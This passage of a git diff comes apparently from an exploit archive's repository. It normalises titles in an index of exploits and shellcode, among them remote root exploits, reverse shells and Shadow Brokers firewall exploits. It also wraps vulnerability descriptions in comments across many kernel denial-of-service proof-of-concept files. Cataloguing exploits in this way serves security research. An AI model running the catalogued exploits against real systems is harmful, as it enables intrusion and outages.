(3)",2016-07-29,xort,linux,remote,8000 +40177,platforms/linux/remote/40177.rb,"Barracuda Web Application Firewall 8.0.1.008 - Post-Authentication Remote Root Exploit (Metasploit)",2016-07-29,xort,linux,remote,8000 40178,platforms/windows/remote/40178.py,"Easy File Sharing Web Server 7.2 - SEH Overflow (Egghunter)",2016-07-29,ch3rn0byl,windows,remote,80 40179,platforms/lin_x86/shellcode/40179.c,"Linux/x86 - NetCat Bind Shell with Port (44 / 52 bytes)",2016-07-29,Kyzer,lin_x86,shellcode,0 -40180,platforms/linux/webapps/40180.txt,"Trend Micro Deep Discovery 3.7 / 3.8 SP1 (3.81) / 3.8 SP2 (3.82) - hotfix_upload.cgi filename Remote Code Execution",2016-07-29,korpritzombie,linux,webapps,443 +40180,platforms/linux/webapps/40180.txt,"Trend Micro Deep Discovery 3.7 / 3.8 SP1 (3.81) / 3.8 SP2 (3.82) - hotfix_upload.cgi Filename Remote Code Execution",2016-07-29,korpritzombie,linux,webapps,443 40184,platforms/multiple/dos/40184.html,"WebKit - TypedArray.copyWithin Memory Corruption",2016-07-29,"Google Security Research",multiple,dos,0 -40185,platforms/php/webapps/40185.py,"phpMyAdmin 4.6.2 - Post-Authenticated Remote Code Execution",2016-07-29,@iamsecurity,php,webapps,80 -40189,platforms/php/webapps/40189.txt,"Wordpress Booking Calendar Plugin 6.2 - SQL Injection",2016-08-01,"Edwin Molenaar",php,webapps,80 -40190,platforms/php/webapps/40190.txt,"Wordpress WP Live Chat Support Plugin 6.2.03 - Persistent Cross-Site Scripting",2016-08-01,"Dennis Kerdijk & Erwin Kievith",php,webapps,80 -40191,platforms/php/webapps/40191.txt,"Wordpress ALO EasyMail Newsletter Plugin 2.9.2 - (Add/Import Arbitrary Subscribers) Cross-Site Request Forgery",2016-08-01,"Yorick Koster",php,webapps,80 +40185,platforms/php/webapps/40185.py,"phpMyAdmin 4.6.2 - Post-Authentication Remote Code Execution",2016-07-29,@iamsecurity,php,webapps,80 +40189,platforms/php/webapps/40189.txt,"WordPress Booking Calendar Plugin 6.2 - SQL Injection",2016-08-01,"Edwin Molenaar",php,webapps,80 +40190,platforms/php/webapps/40190.txt,"WordPress WP Live Chat Support Plugin 6.2.03 - Persistent Cross-Site Scripting",2016-08-01,"Dennis Kerdijk & Erwin Kievith",php,webapps,80 +40191,platforms/php/webapps/40191.txt,"WordPress ALO EasyMail NewsLetter Plugin 2.9.2 - (Add/Import Arbitrary Subscribers) Cross-Site Request Forgery",2016-08-01,"Yorick Koster",php,webapps,80 40192,platforms/windows/dos/40192.py,"Halliburton LogView Pro 9.7.5 - '.cgm' / '.tif' / '.tiff' / '.tifh' Crash (PoC)",2016-08-01,"Karn Ganeshen",windows,dos,0 40194,platforms/multiple/dos/40194.txt,"Wireshark 1.12.0-1.12.12 - NDS Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos,0 40195,platforms/multiple/dos/40195.txt,"Wireshark 2.0.0 < 2.0.4 - MMSE / WAP / WBXML / WSP Dissectors Denial of Service",2016-08-03,"Antti Levomäki",multiple,dos,0 @@ -36359,7 +36362,7 @@ id,file,description,date,author,platform,type,port 40203,platforms/linux/local/40203.py,"zFTP Client 20061220 - (Connection Name) Local Buffer Overflow",2016-08-05,"Juan Sacco",linux,local,0 40204,platforms/php/webapps/40204.txt,"PHP Power Browse 1.2 - Directory Traversal",2016-08-05,"Manuel Mancera",php,webapps,80 40205,platforms/cgi/webapps/40205.txt,"Davolink DV-2051 - Multiple Vulnerabilities",2016-08-05,"Eric Flokstra",cgi,webapps,80 -40206,platforms/php/webapps/40206.txt,"Wordpress Count per Day Plugin 3.5.4 - Persistent Cross-Site Scripting",2016-08-05,"Julien Rentrop",php,webapps,80 +40206,platforms/php/webapps/40206.txt,"WordPress Count per Day Plugin 3.5.4 - Persistent Cross-Site Scripting",2016-08-05,"Julien Rentrop",php,webapps,80 40207,platforms/hardware/webapps/40207.txt,"NASdeluxe NDL-2400r 2.01.09 - OS Command Injection",2016-08-05,"SySS GmbH",hardware,webapps,80 40208,platforms/windows/dos/40208.py,"Kodi Web Server 16.1 - Denial of Service",2016-08-05,"Guillaume Kaddouch",windows,dos,8080 40209,platforms/php/webapps/40209.py,"NUUO NVRmini 2 3.0.8 - Remote Root Exploit",2016-08-06,LiquidWorm,php,webapps,80 @@ -36369,15 +36372,15 @@ id,file,description,date,author,platform,type,port 40213,platforms/cgi/webapps/40213.txt,"NUUO NVRmini 2 3.0.8 - Remote Code Execution (Shellshock)",2016-08-06,LiquidWorm,cgi,webapps,80 40214,platforms/php/webapps/40214.txt,"NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion",2016-08-06,LiquidWorm,php,webapps,80 40215,platforms/php/webapps/40215.txt,"NUUO NVRmini 2 3.0.8 - (strong_user.php) Backdoor Remote Shell Access",2016-08-06,LiquidWorm,php,webapps,80 -40216,platforms/jsp/webapps/40216.txt,"Navis WebAccess - SQL Injection",2016-08-08,bRpsd,jsp,webapps,9000 +40216,platforms/jsp/webapps/40216.txt,"Navis Webaccess - SQL Injection",2016-08-08,bRpsd,jsp,webapps,9000 40218,platforms/php/webapps/40218.txt,"PHPCollab CMS 2.5 - (emailusers.php) SQL Injection",2016-08-08,Vulnerability-Lab,php,webapps,80 40219,platforms/windows/local/40219.txt,"Microsoft Windows 7 (x32/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",windows,local,0 -40220,platforms/php/webapps/40220.txt,"Wordpress Add From Server Plugin < 3.3.2 - (File Upload) Cross-Site Request Forgery",2016-08-08,"Edwin Molenaar",php,webapps,80 +40220,platforms/php/webapps/40220.txt,"WordPress Add From Server Plugin < 3.3.2 - (File Upload) Cross-Site Request Forgery",2016-08-08,"Edwin Molenaar",php,webapps,80 40221,platforms/php/webapps/40221.txt,"Nagios Network Analyzer 2.2.1 - Multiple Cross-Site Request Forgery",2016-08-10,hyp3rlinx,php,webapps,80 40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - zsh TCP Bind Shell Port 9090 (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0 40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - zsh Reverse TCP Shellcode port 9090 (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0 40224,platforms/windows/local/40224.txt,"Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Remote Code Execution (MS16-099)",2016-08-10,COSIG,windows,local,0 -40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Pre-Authenticated Server Side Request Forgery (SSRF)",2016-08-10,"Dawid Golunski",php,webapps,80 +40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Pre-Authentication Server Side Request Forgery (SSRF)",2016-08-10,"Dawid Golunski",php,webapps,80 40226,platforms/windows/local/40226.txt,"EyeLock Myris 3.3.2 - SDK Service Unquoted Service Path Privilege Escalation",2016-08-10,LiquidWorm,windows,local,0 40227,platforms/php/webapps/40227.txt,"EyeLock nano NXT 3.5 - Local File Disclosure",2016-08-10,LiquidWorm,php,webapps,80 40228,platforms/php/webapps/40228.py,"EyeLock nano NXT 3.5 - Remote Root Exploit",2016-08-10,LiquidWorm,php,webapps,80 @@ -36385,10 +36388,10 @@ id,file,description,date,author,platform,type,port 40230,platforms/linux/dos/40230.txt,"SAP SAPCAR - Multiple Vulnerabilities",2016-08-10,"Core Security",linux,dos,0 40231,platforms/java/webapps/40231.txt,"ColoradoFTP 1.3 Prime Edition (Build 8) - Directory Traversal",2016-08-11,Rv3Laboratory,java,webapps,80 40232,platforms/linux/remote/40232.py,"FreePBX 13 / 14 - Remote Command Execution With Privilege Escalation",2016-08-12,pgt,linux,remote,0 -40280,platforms/windows/remote/40280.py,"Microsoft Windows - SRV2.SYS SMB Code Execution Exploit (Python) (MS09-050)",2016-02-26,ohnozzy,windows,remote,0 +40280,platforms/windows/remote/40280.py,"Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)",2016-02-26,ohnozzy,windows,remote,0 40281,platforms/cgi/webapps/40281.txt,"Vanderbilt IP-Camera CCPW3025-IR / CVMW3025-IR - Local File Disclosure",2016-08-22,"Yakir Wizman",cgi,webapps,0 40234,platforms/windows/remote/40234.py,"Easy FTP Server 1.7.0.11 - 'APPE' Command Buffer Overflow Remote Exploit",2012-03-03,Swappage,windows,remote,0 -40279,platforms/windows/remote/40279.py,"Microsoft Windows - NetAPI32.dll Code Execution Exploit (Python) (MS08-067)",2016-02-26,ohnozzy,windows,remote,0 +40279,platforms/windows/remote/40279.py,"Microsoft Windows - NetAPI32.dll Code Execution (Python) (MS08-067)",2016-02-26,ohnozzy,windows,remote,0 40235,platforms/hardware/remote/40235.py,"Samsung Smart Home Camera SNH-P-6410 - Command Injection",2016-08-14,PentestPartners,hardware,remote,0 40236,platforms/ruby/webapps/40236.txt,"GitLab - 'impersonate' Feature Privilege Escalation",2016-08-15,Kaimi,ruby,webapps,80 40262,platforms/cgi/webapps/40262.txt,"SIEMENS IP Cameras (Multiple Models) - Credential Disclosure / Configuration Download",2016-08-19,"Todor Donev",cgi,webapps,80 @@ -36421,9 +36424,9 @@ id,file,description,date,author,platform,type,port 40265,platforms/cgi/webapps/40265.txt,"C2S DVR Management IRDOME-II-C2S / IRBOX-II-C2S_ DVR - Credentials Disclosure / Authentication Bypass",2016-08-19,"Yakir Wizman",cgi,webapps,80 40266,platforms/cgi/webapps/40266.txt,"TOSHIBA IP-Camera IK-WP41A - Authentication Bypass / Configuration Download",2016-08-19,"Todor Donev",cgi,webapps,80 40267,platforms/cgi/webapps/40267.txt,"MESSOA IP-Camera NIC990 - Authentication Bypass / Configuration Download",2016-08-19,"Todor Donev",cgi,webapps,80 -40268,platforms/windows/local/40268.rb,"Windows - Fileless UAC Protection Bypass Privilege Escalation (Metasploit)",2016-08-19,"Pablo González",windows,local,0 +40268,platforms/windows/local/40268.rb,"Microsoft Windows - Fileless UAC Protection Bypass Privilege Escalation (Metasploit)",2016-08-19,"Pablo González",windows,local,0 40269,platforms/cgi/webapps/40269.txt,"ZYCOO IP Phone System - Remote Command Execution",2016-08-19,0x4148,cgi,webapps,0 -40270,platforms/linux/local/40270.txt,"WatchGuard Firewalls - ifconfig Privilege Escalation (ESCALATEPLOWMAN)",2016-08-19,"Shadow Brokers",linux,local,0 +40270,platforms/linux/local/40270.txt,"Watchguard Firewalls - ifconfig Privilege Escalation (ESCALATEPLOWMAN)",2016-08-19,"Shadow Brokers",linux,local,0 40271,platforms/hardware/local/40271.txt,"Cisco ASA / PIX - Privilege Escalation (EPICBANANA)",2016-08-19,"Shadow Brokers",hardware,local,0 40272,platforms/cgi/webapps/40272.txt,"TOPSEC Firewalls - Remote Code Execution (ELIGIBLECONTESTANT)",2016-08-19,"Shadow Brokers",cgi,webapps,0 40273,platforms/cgi/webapps/40273.txt,"TOPSEC Firewalls - Remote Code Execution (ELIGIBLECANDIDATE)",2016-08-19,"Shadow Brokers",cgi,webapps,0 @@ -36437,15 +36440,15 @@ id,file,description,date,author,platform,type,port 40283,platforms/cgi/webapps/40283.txt,"Honeywell IP-Camera HICC-1100PT - Local File Disclosure",2016-08-22,"Yakir Wizman",cgi,webapps,0 40284,platforms/hardware/webapps/40284.txt,"VideoIQ Camera - Local File Disclosure",2016-08-22,"Yakir Wizman",hardware,webapps,0 40286,platforms/java/webapps/40286.txt,"Sakai 10.7 - Multiple Vulnerabilities",2016-08-22,LiquidWorm,java,webapps,0 -40288,platforms/php/webapps/40288.txt,"Wordpress 4.5.3 - Directory Traversal / Denial of Service",2016-08-22,"Yorick Koster",php,webapps,80 +40288,platforms/php/webapps/40288.txt,"WordPress 4.5.3 - Directory Traversal / Denial of Service",2016-08-22,"Yorick Koster",php,webapps,80 40289,platforms/hardware/dos/40289.txt,"ObiHai ObiPhone 1032/1062 < 5-0-0-3497 - Multiple Vulnerabilities",2016-08-22,"David Tomaschik",hardware,dos,0 -40290,platforms/php/webapps/40290.txt,"Wordpress Mail Masta Plugin 1.0 - Local File Inclusion",2016-08-23,"Guillermo Garcia Marcos",php,webapps,80 +40290,platforms/php/webapps/40290.txt,"WordPress Mail Masta Plugin 1.0 - Local File Inclusion",2016-08-23,"Guillermo Garcia Marcos",php,webapps,80 40291,platforms/linux/dos/40291.txt,"Eye of Gnome 3.10.2 - GMarkup Out of Bounds Write",2016-08-23,"Kaslov Dmitri",linux,dos,0 40292,platforms/php/webapps/40292.txt,"SimplePHPQuiz - Blind SQL Injection",2016-08-23,HaHwul,php,webapps,80 40293,platforms/php/webapps/40293.txt,"chatNow - Multiple Vulnerabilities",2016-08-23,HaHwul,php,webapps,80 40294,platforms/php/remote/40294.rb,"Phoenix Exploit Kit - Remote Code Execution (Metasploit)",2016-08-23,Metasploit,php,remote,80 40309,platforms/multiple/dos/40309.txt,"Adobe Flash - Use-After-Free When Returning Rectangle",2016-08-29,"Google Security Research",multiple,dos,0 -40295,platforms/php/webapps/40295.txt,"Wordpress CYSTEME Finder Plugin 1.3 - Arbitrary File Disclosure/Arbitrary File Upload",2016-08-24,T0w3ntum,php,webapps,80 +40295,platforms/php/webapps/40295.txt,"WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Disclosure/Arbitrary File Upload",2016-08-24,T0w3ntum,php,webapps,80 40311,platforms/multiple/dos/40311.txt,"Adobe Flash - MovieClip Transform Getter Use-After-Free",2016-08-29,"Google Security Research",multiple,dos,0 40312,platforms/php/webapps/40312.txt,"FreePBX 13.0.35 - SQL Injection",2016-08-29,i-Hmx,php,webapps,0 40313,platforms/php/dos/40313.php,"PHP 5.0.0 - 'imap_mail()' Local Denial of Service",2016-08-30,"Yakir Wizman",php,dos,0 diff --git a/platforms/atheos/local/21282.c b/platforms/atheos/local/21282.c index 7af9c9db2..c371c8dfa 100755 --- a/platforms/atheos/local/21282.c +++ b/platforms/atheos/local/21282.c @@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/4051/info AtheOS is a freely available, open source operating system. It is distributed under the GPL, and maintained by the AtheOS project. It is possible to escape change rooted directories on AtheOS. Due to insufficient handling of relative pathes, a process in the change rooted directory may change directory using the dot-dot-slash (../) specifier. This would allow access to the system with the privileges of the change rooted process. +*/ #include #include diff --git a/platforms/bsd/dos/21077.c b/platforms/bsd/dos/21077.c index 583358999..41c694a5a 100755 --- a/platforms/bsd/dos/21077.c +++ b/platforms/bsd/dos/21077.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/3220/info It has been reported that there is a locally exploitable vulnerability in BSDI. @@ -5,6 +6,7 @@ It has been reported that there is a locally exploitable vulnerability in BSDI. It is allegedly possible for a userland process to cause the kernel to halt. This may be due to a bad system call. +*/ /* (BSDi)*[v3.0/3.1] system failure, by v9[v9@realhalo.org]. this will result diff --git a/platforms/hardware/webapps/40332.py b/platforms/hardware/webapps/40332.py index 5a074383b..5ad2b37b2 100755 --- a/platforms/hardware/webapps/40332.py +++ b/platforms/hardware/webapps/40332.py @@ -66,7 +66,7 @@ def usage(): print "CSRF Generator --> Buffer Overflow PoC [Needs to be ran as a SuperUser]" print "By: Elvis Collado [b1ack0wl]" print "" - print "Usage: %s -s source.ip -d dst.ip % sys.argv[0] + print "Usage: %s -s source.ip -d dst.ip" % sys.argv[0] print "" print "\t-s Connect back IP [LHOST]" print "\t-d Destination IP of Socket Listener [RHOST]" diff --git a/platforms/linux/dos/19117.c b/platforms/linux/dos/19117.c index fef99fd22..c82bae737 100755 --- a/platforms/linux/dos/19117.c +++ b/platforms/linux/dos/19117.c @@ -1,6 +1,9 @@ +/* source: http://www.securityfocus.com/bid/147/info The "Smurf" denial of service exploits the existance, and forwarding of, packets sent to IP broadcast addreses. By creating an ICMP echo request packet, with the source address set to an IP within the network to be attacked, and the destination address the IP broadcast address of a network which will forward and respond to ICMP echo packets sent to broadcast. Each packet sent in to the network being used to conduct the attack will be responded to by any machine which will respond to ICMP on the broadcast address. Therefore, a single packet can result in an overwhelming response count, all of which are directed to the network the attacker has forged as the source. This can result in significant bandwidth loss. +*/ + /* * diff --git a/platforms/linux/dos/19271.c b/platforms/linux/dos/19271.c index 01f8f763e..feced69d6 100755 --- a/platforms/linux/dos/19271.c +++ b/platforms/linux/dos/19271.c @@ -1,9 +1,12 @@ +/* source: http://www.securityfocus.com/bid/343/info It is possible to leak kernel memory and render TCP ports above 1024 unusable, locked forever in the CLOSE_WAIT state in linux kernels prior to the late 2.1.x and 2.2.0pre releases. In addition to being intentionally exploited, unix applications compiled on linux that are multithreaded may also cause these problems. Below is a harmless example of the exploit: +*/ + // This program will kill a random port on a linux machine. The kernel will diff --git a/platforms/linux/dos/19282.c b/platforms/linux/dos/19282.c index aaaacfa82..1d478301b 100755 --- a/platforms/linux/dos/19282.c +++ b/platforms/linux/dos/19282.c @@ -1,6 +1,9 @@ +/* source: http://www.securityfocus.com/bid/363/info The 2.0.x kernels have a quirk in the TCP implementation that have to do with the accept() call returning after only a syn has been recieved (as opposed to the three way handshake having been completed). Sendmail, which is compiled on many unices, makes the assumption that the three way handshake has been completed and a tcp connection has been fully established. This trust in a standard tcp implementation is seen in the following section of code : +*/ + t = accept(DaemonSocket, diff --git a/platforms/linux/dos/19818.c b/platforms/linux/dos/19818.c index 4e83e3105..b6b686506 100755 --- a/platforms/linux/dos/19818.c +++ b/platforms/linux/dos/19818.c @@ -1,6 +1,9 @@ +/* source: http://www.securityfocus.com/bid/1072/info A denial of service exists in Linux kernels, as related to Unix domain sockets ignoring limits as set in /proc/sys/net/core/wmem_max. By creating successive Unix domain sockets, it is possible to cause a denial of service in some versions of the Linux kernel. Versions 2.2.12, 2.2.14, and 2.3.99-pre2 have all been confirmed as being vulnerable. Previous kernel versions are most likely vulnerable. +*/ + #include #include diff --git a/platforms/linux/dos/22105.c b/platforms/linux/dos/22105.c index 5c0de2c5a..4c17ecf93 100755 --- a/platforms/linux/dos/22105.c +++ b/platforms/linux/dos/22105.c @@ -1,8 +1,11 @@ +/* source: http://www.securityfocus.com/bid/6420/info A denial of service vulnerability has been discovered in the Linux 2.2 kernel. It has been reported that it is possible for an unprivileged user to cause the kernel to stop responding due to a bug in the implementation of mmap(). It should be noted that this issue does not affect the 2.4 kernel tree. This is because support for mmap() in the /proc/pid/mem implementation has been dropped. +*/ + #define PAGES 10 diff --git a/platforms/linux/dos/23946.c b/platforms/linux/dos/23946.c index 69f16438a..5540a540d 100755 --- a/platforms/linux/dos/23946.c +++ b/platforms/linux/dos/23946.c @@ -1,6 +1,9 @@ +/* source: http://www.securityfocus.com/bid/10096/info A vulnerability has been reported in the Linux Kernel that may permit a malicious local user to affect a system-wide denial of service condition. This issue may be triggered via the Kernel signal queue (struct sigqueue) and may be exploited to exhaust the system process table by causing an excessive number of threads to be left in a zombie state. +*/ + #include #include diff --git a/platforms/linux/dos/24078.c b/platforms/linux/dos/24078.c index b42b49000..95973968b 100755 --- a/platforms/linux/dos/24078.c +++ b/platforms/linux/dos/24078.c @@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/10264/info PaX for 2.6 series Linux kernels has been reported prone to a local denial of service vulnerability. The issue is reported to present itself when PaX Address Space Layout Randomization Layout (ASLR) is enabled. The vulnerability may be exploited by a local attacker to influence the kernel into an infinite loop. +*/ /* PaX w/ CONFIG_PAX_RANDMMAP for Linux 2.6.x DoS proof-of-concept diff --git a/platforms/linux/dos/24804.c b/platforms/linux/dos/24804.c index a0a0445dd..0e442c3ca 100755 --- a/platforms/linux/dos/24804.c +++ b/platforms/linux/dos/24804.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/11842/info The Linux Kernel is reported prone to a local denial of service vulnerability. It is reported that the vulnerability exists due to a failure by 'aio_free_ring' to handle exceptional conditions. @@ -7,6 +8,8 @@ This vulnerability requires that mmap() is employed to map the maximum amount of It is reported that when handing 'io_setup' syscalls that are passed large values, the Linux kernel 'aio_setup_ring' will attempt to allocate a structure of page pointers. When a subsequent 'aio_setup_ring' mmap() call fails, 'aio_free_ring' attempts to clean up the page pointers, it will crash during this procedure triggering a kernel panic. +*/ + #include #include diff --git a/platforms/linux/dos/25322.c b/platforms/linux/dos/25322.c index de6d93fe9..3035e3931 100755 --- a/platforms/linux/dos/25322.c +++ b/platforms/linux/dos/25322.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/12949/info A local denial of service vulnerability reportedly affects the Linux kernel. This issue arises due to a failure of the kernel to properly handle malicious, excessive file locks. @@ -5,6 +6,8 @@ A local denial of service vulnerability reportedly affects the Linux kernel. Thi An attacker may leverage this issue to crash or hang the affected kernel and deny service to legitimate users. It should be noted that Symantec has been unable to reproduce this issue after testing. It is possible that this vulnerability is linked to the reporter's specific configuration. More information will be added as it becomes available. +*/ + #include #include diff --git a/platforms/linux/dos/26382.c b/platforms/linux/dos/26382.c index 6a2e8eca0..63397b336 100755 --- a/platforms/linux/dos/26382.c +++ b/platforms/linux/dos/26382.c @@ -1,8 +1,11 @@ +/* source: http://www.securityfocus.com/bid/15156/info Linux Kernel is reported prone to a local denial-of-service vulnerability. This issue arises from an infinite loop when binding IPv6 UDP ports. +*/ + /* * Linux kernel diff --git a/platforms/linux/dos/26489.c b/platforms/linux/dos/26489.c index 5b6936e29..9f9840cba 100755 --- a/platforms/linux/dos/26489.c +++ b/platforms/linux/dos/26489.c @@ -1,8 +1,11 @@ +/* source: http://www.securityfocus.com/bid/15365/info Linux Kernel is reported prone to a local denial-of-service vulnerability. This issue arises from a failure to properly unregister kernel resources when network devices are removed. This issue allows local attackers to deny service to legitimate users. Attackers may also be able to execute arbitrary code in the context of the kernel, but this has not been confirmed. +*/ + /* * Linux kernel diff --git a/platforms/linux/dos/26648.c b/platforms/linux/dos/26648.c index 537b7c684..9a0c189a1 100755 --- a/platforms/linux/dos/26648.c +++ b/platforms/linux/dos/26648.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/15627/info Linux kernel is susceptible to a local denial-of-service vulnerability. @@ -7,6 +8,7 @@ Local attackers may trigger this issue by obtaining numerous file-lock leases, w This issue allows local attackers to consume excessive kernel memory, eventually leading to an out-of-memory condition and a denial of service for legitimate users. Kernel versions prior to 2.6.15-rc3 are vulnerable to this issue. +*/ #include diff --git a/platforms/linux/dos/26749.c b/platforms/linux/dos/26749.c index b18927eab..f4c871067 100755 --- a/platforms/linux/dos/26749.c +++ b/platforms/linux/dos/26749.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/15745/info Linux kernel is susceptible to a local denial-of-service vulnerability. @@ -7,6 +8,8 @@ This issue is triggered when excessive kernel memory is consumed by numerous fil This issue allows local attackers to consume excessive kernel memory, eventually leading to an out-of-memory condition and ultimately to a denial of service for legitimate users. Kernel versions from 2.6.10 through to 2.6.14.2 are vulnerable to this issue. +*/ + #include diff --git a/platforms/linux/dos/26811.c b/platforms/linux/dos/26811.c index 55be32773..fbfe32181 100755 --- a/platforms/linux/dos/26811.c +++ b/platforms/linux/dos/26811.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/15846/info Linux kernel is prone to a local integer-overflow vulnerability. @@ -5,6 +6,8 @@ Linux kernel is prone to a local integer-overflow vulnerability. A successful attack can result in a kernel crash. Arbitrary code execution may be possible as well, but this has not been confirmed. All 2.6.x versions of the Linux kernel are considered vulnerable at the moment. +*/ + #define _GNU_SOURCE #define __USE_FILE_OFFSET64 diff --git a/platforms/linux/dos/27031.c b/platforms/linux/dos/27031.c index c7e7996e4..c701ff5da 100755 --- a/platforms/linux/dos/27031.c +++ b/platforms/linux/dos/27031.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/16135/info Linux kernel is prone to a local denial-of-service vulnerability. @@ -5,6 +6,8 @@ Linux kernel is prone to a local denial-of-service vulnerability. This issue affects the 'set_mempolicy()' function of the 'mm/mempolicy.c' file. Successful exploitation causes the kernel to crash, leading to a denial-of-service condition. +*/ + #include diff --git a/platforms/linux/dos/29781.c b/platforms/linux/dos/29781.c index 922cec232..974239bdf 100755 --- a/platforms/linux/dos/29781.c +++ b/platforms/linux/dos/29781.c @@ -1,8 +1,11 @@ +/* source: http://www.securityfocus.com/bid/23142/info The Linux kernel is prone to a NULL-pointer dereference vulnerability. A local attacker can exploit this issue to crash the affected application, denying service to legitimate users. The attacker may also be able to execute arbitrary code with elevated privileges, but this has not been confirmed. +*/ + __ ip2.c __ // advanced exploit code for catastrophic kernel bug by Joey Mengele, professional hacker diff --git a/platforms/linux/dos/29916.c b/platforms/linux/dos/29916.c index 582510410..00ca014ac 100755 --- a/platforms/linux/dos/29916.c +++ b/platforms/linux/dos/29916.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/23677/info The Linux kernel is prone to a denial-of-service vulnerability. This issue presents itself when a NETLINK message is misrouted. @@ -5,6 +6,7 @@ The Linux kernel is prone to a denial-of-service vulnerability. This issue prese A local attacker may exploit this issue to trigger an infinite-recursion stack-based overflow in the kernel. This results in a denial of service to legitimate users. Versions prior to 2.6.20.8 are vulnerable. +*/ #include #include diff --git a/platforms/linux/dos/30080.c b/platforms/linux/dos/30080.c index 156428d18..3de10cb2e 100755 --- a/platforms/linux/dos/30080.c +++ b/platforms/linux/dos/30080.c @@ -1,8 +1,11 @@ +/* source: http://www.securityfocus.com/bid/24134/info The Linux Kernel is prone to a denial-of-service vulnerability. A local attacker can exploit this issue to cause the kernel to crash, effectively denying service to legitimate users. +*/ + #include #include diff --git a/platforms/linux/dos/30902.c b/platforms/linux/dos/30902.c index 0f3a9b164..f9a9efe4a 100755 --- a/platforms/linux/dos/30902.c +++ b/platforms/linux/dos/30902.c @@ -1,8 +1,11 @@ +/* source: http://www.securityfocus.com/bid/26943/info The Linux kernel is prone to a remote denial-of-service vulnerability because it fails to adequately validate specially crafted IPv6 'Hop-By-Hop' headers. Attackers can exploit this issue to cause a kernel panic, denying service to legitimate users. +*/ + /* * Clemens Kurtenbach diff --git a/platforms/linux/dos/31965.c b/platforms/linux/dos/31965.c index cde477c9a..96665607d 100755 --- a/platforms/linux/dos/31965.c +++ b/platforms/linux/dos/31965.c @@ -1,8 +1,11 @@ +/* source: http://www.securityfocus.com/bid/29945/info The Linux kernel is prone to a local denial-of-service vulnerability caused by a race condition. Attackers can exploit this issue to cause the kernel to become unresponsive, denying service to legitimate users. +*/ + #include #include diff --git a/platforms/linux/dos/31966.c b/platforms/linux/dos/31966.c index a00db3124..78f3ff4cc 100755 --- a/platforms/linux/dos/31966.c +++ b/platforms/linux/dos/31966.c @@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/29945/info The Linux kernel is prone to a local denial-of-service vulnerability caused by a race condition. Attackers can exploit this issue to cause the kernel to become unresponsive, denying service to legitimate users. +*/ /* This software is provided 'as-is', without any express or implied warranty. In no event will the authors be held liable for any diff --git a/platforms/linux/dos/32682.c b/platforms/linux/dos/32682.c index 94942e200..363853a27 100755 --- a/platforms/linux/dos/32682.c +++ b/platforms/linux/dos/32682.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/32985/info The Linux kernel is prone to a local denial-of-service vulnerability. @@ -5,6 +6,8 @@ The Linux kernel is prone to a local denial-of-service vulnerability. Local attackers can exploit this issue to cause a soft lockup, denying service to legitimate users. Versions prior to Linux kernel 2.6.25 are vulnerable. +*/ + #include #include diff --git a/platforms/linux/dos/33015.c b/platforms/linux/dos/33015.c index 5e02cd52d..704518615 100755 --- a/platforms/linux/dos/33015.c +++ b/platforms/linux/dos/33015.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/35143/info The Linux kernel is prone to a local denial-of-service vulnerability. @@ -9,6 +10,8 @@ This issue was introduced in Linux Kernel 2.6.19. The following versions have be Linux Kernel 2.6.30-rc3 Linux Kernel 2.6.27.24 Linux Kernel 2.6.29.4 +*/ + pipe(pfds); snprintf(buf, sizeof(buf), "/tmp/%d", getpid()); diff --git a/platforms/linux/dos/33148.c b/platforms/linux/dos/33148.c index 080bf1c31..1edec29fe 100755 --- a/platforms/linux/dos/33148.c +++ b/platforms/linux/dos/33148.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/35976/info The Linux kernel is prone to a local denial-of-service vulnerability. @@ -5,6 +6,8 @@ The Linux kernel is prone to a local denial-of-service vulnerability. Attackers can exploit this issue to crash the affected kernel, denying service to legitimate users. Given the nature of this issue, attackers may also be able to execute arbitrary code, but this has not been confirmed. This issue was introduced in Linux kernel 2.6.28-rc1 and fixed in 2.6.31-rc5-git3. +*/ + #include diff --git a/platforms/linux/dos/33193.c b/platforms/linux/dos/33193.c index f2f06580c..b85e44e9b 100755 --- a/platforms/linux/dos/33193.c +++ b/platforms/linux/dos/33193.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/36191/info The Linux kernel is prone to a local denial-of-service vulnerability. @@ -5,6 +6,8 @@ The Linux kernel is prone to a local denial-of-service vulnerability. Attackers can exploit this issue to crash the affected kernel, denying service to legitimate users. Given the nature of this issue, attackers may also be able to execute arbitrary code, but this has not been confirmed. This issue was introduced in Linux kernel 2.6.26 and fixed in 2.6.31-rc8. +*/ + /* gcc -o KernelTtyTest KernelTtyTest.c -Wall -O2 -lutil */ #define _GNU_SOURCE 1 diff --git a/platforms/linux/dos/33635.c b/platforms/linux/dos/33635.c index e752233ab..c639c220d 100755 --- a/platforms/linux/dos/33635.c +++ b/platforms/linux/dos/33635.c @@ -1,8 +1,11 @@ +/* source: http://www.securityfocus.com/bid/38185/info The Linux kernel is prone to a local denial-of-service vulnerability. Attackers can exploit this issue to crash the affected kernel, denying service to legitimate users. Given the nature of this issue, attackers may also be able to execute arbitrary code, but this has not been 